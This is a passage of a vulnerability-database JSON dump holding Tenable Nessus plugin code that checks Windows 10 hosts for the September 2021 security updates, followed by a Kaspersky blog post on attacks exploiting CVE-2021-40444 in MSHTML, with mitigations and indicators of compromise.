value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Office Word Malicious MSHTML RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"false\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-09\";\nkbs = make_list('5005568');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'17763',\n rollup_date:'09_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005568])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:55:07", "description": "The remote Windows host is missing security update 5005566.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. 
An attacker can exploit this to gain elevated privileges.\n (CVE-2021-36954, CVE-2021-36955, CVE-2021-36963, CVE-2021-36964, CVE-2021-36966, CVE-2021-36967, CVE-2021-36973, CVE-2021-36974, CVE-2021-36975, CVE-2021-38628, CVE-2021-38630, CVE-2021-38633, CVE-2021-38634, CVE-2021-38638, CVE-2021-38639, CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-36960, CVE-2021-36962, CVE-2021-36969, CVE-2021-36972, CVE-2021-38629, CVE-2021-38635, CVE-2021-38636, CVE-2021-38637)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2021-38624, CVE-2021-38632)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-36965, CVE-2021-36958, CVE-2021-40444))\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-36961)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. 
(CVE-2021-36959)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T00:00:00", "type": "nessus", "title": "KB5005566: Windows 10 version 1909 / Windows Server 1909 Security Update (September 2021)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26435", "CVE-2021-36954", "CVE-2021-36955", "CVE-2021-36958", "CVE-2021-36959", "CVE-2021-36960", "CVE-2021-36961", "CVE-2021-36962", "CVE-2021-36963", "CVE-2021-36964", "CVE-2021-36965", "CVE-2021-36966", "CVE-2021-36967", "CVE-2021-36969", "CVE-2021-36972", "CVE-2021-36973", "CVE-2021-36974", "CVE-2021-36975", "CVE-2021-38624", "CVE-2021-38628", "CVE-2021-38629", "CVE-2021-38630", "CVE-2021-38632", "CVE-2021-38633", "CVE-2021-38634", "CVE-2021-38635", "CVE-2021-38636", "CVE-2021-38637", "CVE-2021-38638", "CVE-2021-38639", "CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40444", "CVE-2021-40447"], "modified": "2022-08-22T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_SEP_5005566.NASL", "href": "https://www.tenable.com/plugins/nessus/153383", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, 
Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153383);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/08/22\");\n\n script_cve_id(\n \"CVE-2021-26435\",\n \"CVE-2021-36954\",\n \"CVE-2021-36955\",\n \"CVE-2021-36958\",\n \"CVE-2021-36959\",\n \"CVE-2021-36960\",\n \"CVE-2021-36961\",\n \"CVE-2021-36962\",\n \"CVE-2021-36963\",\n \"CVE-2021-36964\",\n \"CVE-2021-36965\",\n \"CVE-2021-36966\",\n \"CVE-2021-36967\",\n \"CVE-2021-36969\",\n \"CVE-2021-36972\",\n \"CVE-2021-36973\",\n \"CVE-2021-36974\",\n \"CVE-2021-36975\",\n \"CVE-2021-38624\",\n \"CVE-2021-38628\",\n \"CVE-2021-38629\",\n \"CVE-2021-38630\",\n \"CVE-2021-38632\",\n \"CVE-2021-38633\",\n \"CVE-2021-38634\",\n \"CVE-2021-38635\",\n \"CVE-2021-38636\",\n \"CVE-2021-38637\",\n \"CVE-2021-38638\",\n \"CVE-2021-38639\",\n \"CVE-2021-38667\",\n \"CVE-2021-38671\",\n \"CVE-2021-40444\",\n \"CVE-2021-40447\"\n );\n script_xref(name:\"MSKB\", value:\"5005566\");\n script_xref(name:\"MSFT\", value:\"MS21-5005566\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0429-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB5005566: Windows 10 version 1909 / Windows Server 1909 Security Update (September 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005566.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. 
An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-36954, CVE-2021-36955, CVE-2021-36963,\n CVE-2021-36964, CVE-2021-36966, CVE-2021-36967,\n CVE-2021-36973, CVE-2021-36974, CVE-2021-36975,\n CVE-2021-38628, CVE-2021-38630, CVE-2021-38633,\n CVE-2021-38634, CVE-2021-38638, CVE-2021-38639,\n CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-36960, CVE-2021-36962,\n CVE-2021-36969, CVE-2021-36972, CVE-2021-38629,\n CVE-2021-38635, CVE-2021-38636, CVE-2021-38637)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-38624, CVE-2021-38632)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-36965,\n CVE-2021-36958, CVE-2021-40444))\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-36961)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. 
(CVE-2021-36959)\");\n # https://support.microsoft.com/en-us/topic/september-14-2021-kb5005566-os-build-18363-1801-c2535eb5-9e8a-4127-a923-0c6a643bba1d\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ff9fca7f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005566.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36958\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-36965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Office Word Malicious MSHTML RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"false\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-09';\nkbs = make_list(\n '5005566'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'18363',\n rollup_date:'09_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005566])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:54:48", "description": "The remote Windows host is missing security update 5005565.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. 
An attacker can exploit this to gain elevated privileges.\n (CVE-2021-36954, CVE-2021-36955, CVE-2021-36963, CVE-2021-36964, CVE-2021-36966, CVE-2021-36967, CVE-2021-36973, CVE-2021-36974, CVE-2021-36975, CVE-2021-38628, CVE-2021-38630, CVE-2021-38633, CVE-2021-38634, CVE-2021-38638, CVE-2021-38639, CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-36960, CVE-2021-36962, CVE-2021-36969, CVE-2021-36972, CVE-2021-38629, CVE-2021-38635, CVE-2021-38636, CVE-2021-38637)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2021-38624, CVE-2021-38632)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-36965, CVE-2021-36958, CVE-2021-40444)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-36961)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. 
(CVE-2021-36959)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T00:00:00", "type": "nessus", "title": "KB5005565: Windows 10 Version 2004 / Windows 10 Version 20H2 / Windows 10 Version 21H1 Security Update (September 2021)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26435", "CVE-2021-36954", "CVE-2021-36955", "CVE-2021-36958", "CVE-2021-36959", "CVE-2021-36960", "CVE-2021-36961", "CVE-2021-36962", "CVE-2021-36963", "CVE-2021-36964", "CVE-2021-36965", "CVE-2021-36966", "CVE-2021-36967", "CVE-2021-36969", "CVE-2021-36972", "CVE-2021-36973", "CVE-2021-36974", "CVE-2021-36975", "CVE-2021-38624", "CVE-2021-38628", "CVE-2021-38629", "CVE-2021-38630", "CVE-2021-38632", "CVE-2021-38633", "CVE-2021-38634", "CVE-2021-38635", "CVE-2021-38636", "CVE-2021-38637", "CVE-2021-38638", "CVE-2021-38639", "CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40444", "CVE-2021-40447"], "modified": "2022-08-22T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_SEP_5005565.NASL", "href": "https://www.tenable.com/plugins/nessus/153381", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) 
Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153381);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/08/22\");\n\n script_cve_id(\n \"CVE-2021-26435\",\n \"CVE-2021-36954\",\n \"CVE-2021-36955\",\n \"CVE-2021-36958\",\n \"CVE-2021-36959\",\n \"CVE-2021-36960\",\n \"CVE-2021-36961\",\n \"CVE-2021-36962\",\n \"CVE-2021-36963\",\n \"CVE-2021-36964\",\n \"CVE-2021-36965\",\n \"CVE-2021-36966\",\n \"CVE-2021-36967\",\n \"CVE-2021-36969\",\n \"CVE-2021-36972\",\n \"CVE-2021-36973\",\n \"CVE-2021-36974\",\n \"CVE-2021-36975\",\n \"CVE-2021-38624\",\n \"CVE-2021-38628\",\n \"CVE-2021-38629\",\n \"CVE-2021-38630\",\n \"CVE-2021-38632\",\n \"CVE-2021-38633\",\n \"CVE-2021-38634\",\n \"CVE-2021-38635\",\n \"CVE-2021-38636\",\n \"CVE-2021-38637\",\n \"CVE-2021-38638\",\n \"CVE-2021-38639\",\n \"CVE-2021-38667\",\n \"CVE-2021-38671\",\n \"CVE-2021-40444\",\n \"CVE-2021-40447\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0429-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"MSKB\", value:\"5005565\");\n script_xref(name:\"MSFT\", value:\"MS21-5005565\");\n\n script_name(english:\"KB5005565: Windows 10 Version 2004 / Windows 10 Version 20H2 / Windows 10 Version 21H1 Security Update (September 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005565.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. 
An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-36954, CVE-2021-36955, CVE-2021-36963,\n CVE-2021-36964, CVE-2021-36966, CVE-2021-36967,\n CVE-2021-36973, CVE-2021-36974, CVE-2021-36975,\n CVE-2021-38628, CVE-2021-38630, CVE-2021-38633,\n CVE-2021-38634, CVE-2021-38638, CVE-2021-38639,\n CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-36960, CVE-2021-36962,\n CVE-2021-36969, CVE-2021-36972, CVE-2021-38629,\n CVE-2021-38635, CVE-2021-38636, CVE-2021-38637)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-38624, CVE-2021-38632)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-36965,\n CVE-2021-36958, CVE-2021-40444)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-36961)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. 
(CVE-2021-36959)\");\n # https://support.microsoft.com/en-us/topic/september-14-2021-kb5005565-os-builds-19041-1237-19042-1237-and-19043-1237-292cf8ed-f97b-4cd8-9883-32b71e3e6b44\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?45dd819c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005565.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36958\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-36965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Office Word Malicious MSHTML RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"false\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-09';\nkbs = make_list(\n '5005565'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19041',\n rollup_date:'09_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005565])\n||\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19042',\n rollup_date:'09_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005565]) \n||\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19043',\n rollup_date:'09_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005565])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2021-09-25T08:35:29", "description": "\n\n## Summary\n\nLast week, Microsoft reported 
the remote code execution vulnerability CVE-2021-40444 in the MSHTML browser engine. According to the company, this vulnerability has already been used in targeted attacks against Microsoft Office users. In an attempt to exploit this vulnerability, attackers create a document with a specially-crafted object. If a user opens the document, MS Office will download and execute a malicious script. \nAccording to our data, the same attacks are still happening all over the world. We are currently seeing attempts to exploit the CVE-2021-40444 vulnerability targeting companies in the research and development sector, the energy sector and large industrial sectors, banking and medical technology development sectors, as well as telecommunications and the IT sector. Due to its ease of exploitation and the few published [Proof-of-Concept](<https://encyclopedia.kaspersky.com/glossary/poc-proof-of-concept/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) (PoC), we expect to see an increase in attacks using this vulnerability.\n\n_Geography of CVE-2021-40444 exploitation attempts_\n\nKaspersky is aware of targeted attacks using CVE-2021-40444, and our products protect against attacks leveraging the vulnerability. Possible detection names are:\n\n * HEUR:Exploit.MSOffice.CVE-2021-40444.a\n * HEUR:Trojan.MSOffice.Agent.gen\n * PDM:Exploit.Win32.Generic\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/16133928/02-cve-2021-40444-kedr.png>) \n_Killchain generated by KEDR during execution of CVE-2021-40444 Proof-of-Concept _\n\nExperts at Kaspersky are monitoring the situation closely and improving mechanisms to detect this vulnerability using [Behavior Detection](<https://www.kaspersky.com/enterprise-security/wiki-section/products/behavior-based-protection>) and [Exploit Prevention](<https://www.kaspersky.com/enterprise-security/wiki-section/products/exploit-prevention>) components. 
Within our [Managed Detection and Response](<https://www.kaspersky.com/enterprise-security/managed-detection-and-response>) service, our SOC experts are able to detect when this vulnerability is exploited, investigate such attacks and notify customers.\n\n## Technical details\n\nThe remote code execution vulnerability CVE-2021-40444 was found in MSHTML, the Internet Explorer browser engine which is a component of modern Windows systems, both user and server. Moreover, the engine is often used by other programs to work with web content (e.g. MS Word or MS PowerPoint). \nIn order to exploit the vulnerability, attackers embed a special object in a Microsoft Office document containing a URL for a malicious script. If a victim opens the document, Microsoft Office will download the malicious script from the URL and run it using the MSHTML engine. Then the script can use ActiveX controls to perform malicious actions on the victim's computer. For example, the original zero-day exploit which was used in targeted attacks at the time of detection used ActiveX controls to download and execute a Cobalt Strike payload. We are currently seeing various types of malware, mostly backdoors, which are delivered by exploiting the CVE-2021-40444 vulnerability.\n\n## Mitigations\n\n * Follow [Microsoft security update guidelines.](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>)\n * Use the latest [Threat Intelligence information](<https://www.kaspersky.com/enterprise-security/threat-intelligence>) to keep up to date with TTPs used by threat actors.\n * Businesses should use a security solution that provides vulnerability, patch management and exploit prevention components, such as the [Automatic Exploit Prevention](<https://www.kaspersky.com/enterprise-security/wiki-section/products/exploit-prevention>) component in Kaspersky Endpoint Security for Business. 
The component monitors suspicious actions in applications and blocks malicious file execution.\n * Use solutions like [Kaspersky Endpoint Detection and Response](<https://www.kaspersky.com/enterprise-security/endpoint-detection-response-edr>) and [Kaspersky Managed Detection and Response](<https://www.kaspersky.com/enterprise-security/managed-detection-and-response>) service, which help identify and stop an attack at an early stage before the attackers achieve their final goal.\n\n## IoC\n\n**MD5** \n[ef32824c7388a848c263deb4c360fd64](<https://opentip.kaspersky.com/ef32824c7388a848c263deb4c360fd64/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) \n[e58b75e1f588508de7c15a35e2553b86](<https://opentip.kaspersky.com/e58b75e1f588508de7c15a35e2553b86/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) \n[e89dbc1097cfb8591430ff93d9952260](<https://opentip.kaspersky.com/e89dbc1097cfb8591430ff93d9952260/?utm_source=SL&utm_medium=SL&utm_campaign=SL>)\n\n**URL** \n[hidusi[.]com](<https://opentip.kaspersky.com/hidusi.com/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) \n[103.231.14[.]134](<https://opentip.kaspersky.com/103.231.14.134/?utm_source=SL&utm_medium=SL&utm_campaign=SL>)", "cvss3": {}, "published": "2021-09-16T15:30:57", "type": "securelist", "title": "Exploitation of the CVE-2021-40444 vulnerability in MSHTML", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-16T15:30:57", "id": "SECURELIST:63306FA6D056BD9A04969409AC790D84", "href": "https://securelist.com/exploitation-of-the-cve-2021-40444-vulnerability-in-mshtml/104218/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T14:36:44", "description": "\n\n * **IT threat evolution Q3 2021**\n * [IT threat evolution in Q3 2021. PC statistics](<https://securelist.com/it-threat-evolution-in-q3-2021-pc-statistics/104982/>)\n * [IT threat evolution in Q3 2021. 
